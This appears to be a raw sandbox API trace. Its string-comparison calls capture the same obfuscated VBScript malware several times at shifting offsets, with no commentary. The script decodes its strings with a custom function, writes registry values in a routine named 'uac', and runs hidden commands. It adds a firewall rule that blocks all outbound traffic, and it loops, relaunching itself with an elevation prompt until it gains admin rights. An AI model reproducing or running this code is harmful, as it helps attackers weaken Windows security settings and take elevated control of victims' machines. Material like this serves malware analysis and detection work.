bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 95 [0226.378] wcsncmp (_String1="e.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0226.378] wcsncmp (_String1=".Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 33 [0226.379] wcsncmp (_String1="Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 67 [0226.379] wcsncmp (_String1="rotocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101 [0226.379] wcsncmp (_String1="otocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite 